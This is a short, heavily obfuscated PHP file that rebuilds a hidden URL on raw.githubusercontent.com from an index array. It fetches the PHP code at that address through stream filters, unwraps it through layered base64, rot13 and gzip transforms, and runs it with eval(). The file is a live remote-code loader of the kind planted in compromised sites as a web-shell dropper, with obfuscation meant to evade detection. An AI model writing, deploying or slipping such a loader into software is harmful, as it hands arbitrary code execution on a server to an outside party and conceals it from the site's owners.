<?php
$gibhivlalsmqwtwqtwqt=array_merge(range('a', 'z'), range('A', 'Z'), range('0', '9'), ['.', ':', '/', '_', '-']);$inxnaksnqwtwqtx14414d=[7,19,19,15,18,63,64,64,17,0,22,62,6,8,19,7,20,1,20,18,4,17,2,14,13,19,4,13,19,62,2,14,12,64,18,4,10,0,8,14,22,0,17,8,3,0,64,6,4,17,0,12,23,64,17,4,5,18,64,7,4,0,3,18,64,12,0,8,13,64,10,10,10,62,15,7,15];;$dmnisnstringaxmomowqt1x14ss='';
foreach ($inxnaksnqwtwqtx14414d as $youmasonntwqowtqx77d) {
    $dmnisnstringaxmomowqt1x14ss .= $gibhivlalsmqwtwqtwqt[$youmasonntwqowtqx77d];
}
$xnniwqt="$dmnisnstringaxmomowqt1x14ss";$beser=strrev('edoced_46esab');$ster=strrev('31tor_rts');$gzcom=strrev('sserpmoczg');$gzucom=strrev('sserpmocnuzg');$gzenx=strrev('edocnezg');$gzdenx=strrev('edocedzg');$gzdexf=strrev('etalfedzg');$gzixnf=strrev('etalfnizg');$mochinzinxcawqtwqw=fopen("php://filter/read=convert.base64-encode|string.rot13|convert.base64-encode|string.rot13/resource=$xnniwqt", "r");$xmmxninwqtninwqt2=fopen("php://temp", "r+");
stream_copy_to_stream($mochinzinxcawqtwqw, $xmmxninwqtninwqt2);
rewind($xmmxninwqtninwqt2);$mxnnnwqitbnoiqwtoqwotiqwionoi215=stream_get_contents($xmmxninwqtninwqt2);$mxnnnqwnowqiwtwqx=$beser($ster($beser($ster($mxnnnwqitbnoiqwtoqwotiqwionoi215))));$enkanet=$gzcom($gzdexf($gzenx($gzdexf($gzcom($gzenx($mxnnnqwnowqiwtwqx))))));

try {
    eval('?>' . $gzdenx($gzucom($gzixnf($gzdenx($gzixnf($gzucom($enkanet)))))));
} catch (Throwable $e) {
    echo "Error";
}
?>
